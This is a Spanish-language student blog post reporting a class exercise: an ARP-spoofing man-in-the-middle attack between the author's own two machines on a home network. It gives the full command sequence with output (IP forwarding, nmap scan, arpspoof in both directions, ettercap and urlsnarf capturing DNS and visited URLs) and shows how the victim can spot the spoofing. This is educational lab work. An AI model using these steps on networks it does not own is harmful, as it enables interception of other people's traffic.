Max Hernandez

Laberinto - Ejemplo de Canvas en HTML5

martes, 19 de febrero de 2013

Tarea 3: Men in the middle

Hola, esta semana en redes de telecomunicaciones tocamos el tema de conexiones wireless, para esto se nos dio la tarea de realizar un ataque común a esta tipo de redes, claro sin afectar a un tercero solamente, por fines educativos. El ataque se hizo entre mis dos computadoras y en la red local de mi casa.

Esta publicación servira a manera de reporte para la tarea de la clase, las herramientas utilizadas para la practica son las siguientes:

El sistema operativo de ambas computadoras fue Ubuntu de inux
  • Nmap para rastrear ip's en mi red
  • Arpspoof para realizar el ataque man in the middle
  • Urlsnarf para filtrar URL's en la red
  • Ettercap para filtrar paquetes

A grandes rasgos estos fueron los pasos que utilice para direccionar la conexión de la computadora afectada:
sudo su
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig
nmap -sF 192.168.1.1-255
arpspoof -i interface -t  
arpspoof -i interface -t  urlsnarf -i interface
ettercap -T -i interface

Mi ejemplo practico

El primer paso fue permitir el reenvío de paquetes por parte de la computadora atacante, para eso solo cambiamos la variable del sistema "/proc/sys/net/ipv4/ip_forward" de la siguiente manera:
 kalavera@kalavera-AOD270:~$ sudo su
[sudo] password for kalavera:
root@kalavera-AOD270:/home/kalavera# cat /proc/sys/net/ipv4/ip_forward
0
root@kalavera-AOD270:/home/kalavera# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kalavera-AOD270:/home/kalavera# cat /proc/sys/net/ipv4/ip_forward
1
 
El siguiente paso es conocer cual es la dirección de la computadora en la que estamos trabajando en la red local y la interfaz con la cual esta conectada a la red. Como podemos ver la dirección de mi computadora durante la practica era la "192.168.1.67" puesta en la interfaz "wlan0"
root@kalavera-AOD270:/home/kalavera# ifconfig
wlan0     Link encap:Ethernet  HWaddr --:--:--:--:--:--
          inet addr:192.168.1.67  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::864b:f5ff:fe3c:37e0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:170763 errors:0 dropped:0 overruns:0 frame:0
          TX packets:181064 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:109200759 (109.2 MB)  TX bytes:103342011 (103.3 MB)

Ahora utilice Nmap para escanear las IP's de todas las computadoras conectadas a la red local, eso con el fin de encontrar la IP de la computadoraa la cual se le va a hacer el ataque.

root@kalavera-AOD270:/home/kalavera# nmap -sF 192.168.1.1-255
Starting Nmap 5.21 ( http://nmap.org ) at 2013-02-17 14:45 CST

Nmap scan report for 192.168.1.67
Host is up (0.000080s latency).
Not shown: 999 closed ports
PORT   STATE         SERVICE
80/tcp open|filtered http

Nmap scan report for 192.168.1.105
Host is up (0.0055s latency).
Not shown: 999 closed ports
PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: --:--:--:--:--:-- (Unknown)

Nmap scan report for 192.168.1.254
Host is up (0.0052s latency).
All 1000 scanned ports on 192.168.1.254 are open|filtered
MAC Address: --:--:--:--:--:-- (Unknown)

Nmap done: 255 IP addresses (5 hosts up) scanned in 55.74 seconds

Sabiendo que la IP del modem termina con 254 y la IP de nuestra computadora es la que termina con 67, podemos suponer que la IP de la computadora a la que se hara el ataque es la que tiene terminación 105.

Ahora haciendo uso de "arspoof" podemos empezar el ataque redireccionando los paquetes del modem al host.

root@kalavera-AOD270:/home/kalavera# arpspoof -i wlan0 -t 192.168.1.254 192.168.1.105
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:--
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:--
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:--
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:--

Y despues en sentido contrario.

root@kalavera-AOD270:/home/kalavera# arpspoof -i wlan0 -t 192.168.1.105 192.168.1.254

--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:--
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:--
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:--
--:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:--

Una vez que establecí el ataque man in the middle, en la red de nuestra computadora recibimos los paquetes del atacado. El host atacado puede ver que hay un intermediario escuchando en la red, utilizando el protocolo de resolución de direcciones. Con el siguiente comando:

max@juan-laptop:~$ arp -an
? (192.168.1.67) at 84:4b:f5:3c:37:e0 [ether] on wlan0
? (192.168.1.254) at 84:4b:f5:3c:37:e0 [ether] on wlan0

EN este punto utilice ettercap para filtrar los paquetes que recibia la computadora, y mostrar en la terminal una lista con los paquetes filtrados.
 
root@kalavera-AOD270:/home/kalavera# ettercap -T -i wlan0

ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA
Listening on wlan0... (Ethernet)
 wlan0 ->    --:--:--:--:--:--      192.168.1.67     255.255.255.0
 
Sun Feb 17 15:21:34 2013
UDP  192.168.1.254:53 --> 192.168.1.105:44089 |
D............shop.ubuntu.com.................U...

Sun Feb 17 15:21:34 2013
UDP  192.168.1.105:33465 --> 192.168.1.254:53 |
[............www.ubuntu.com.....

Sun Feb 17 15:21:34 2013
UDP  192.168.1.254:53 --> 192.168.1.105:33465 |
[............www.ubuntu.com.................[.YX
Como podemos ver, el host atacado transmitió un mensaje entre una pagina de ubuntu y el.

El ultimo programa que utilice para filtrar paquetes es "urlsnarf" que se utiliza para filtrar las url visitadas en los paquetes, despues de activarlo en la computadora atacada, visite la pagina "groveshark" y los resultados fueron los siguientes:

-----root@kalavera-AOD270:/home/kalavera# urlsnarf -i wlan0

urlsnarf: listening on wlan0 [tcp port 80 or port 8080 or port 3128]

juan-laptop.local - - [17/Feb/2013:15:27:30 -0600] "GET http://grooveshark.com/ HTTP/1.1" - - "-" "informacion de tu sistema operativo y navegador"

Como podemos ver el programa muestra la pagina visitada ademas de la información sobre el sistema operativo y el navegador de la computadora.

Buen día.

1 comentario:

  1. Cuida los acentos. Por lo general se dice "man in the middle" en singular. 10 pts.

    ResponderBorrar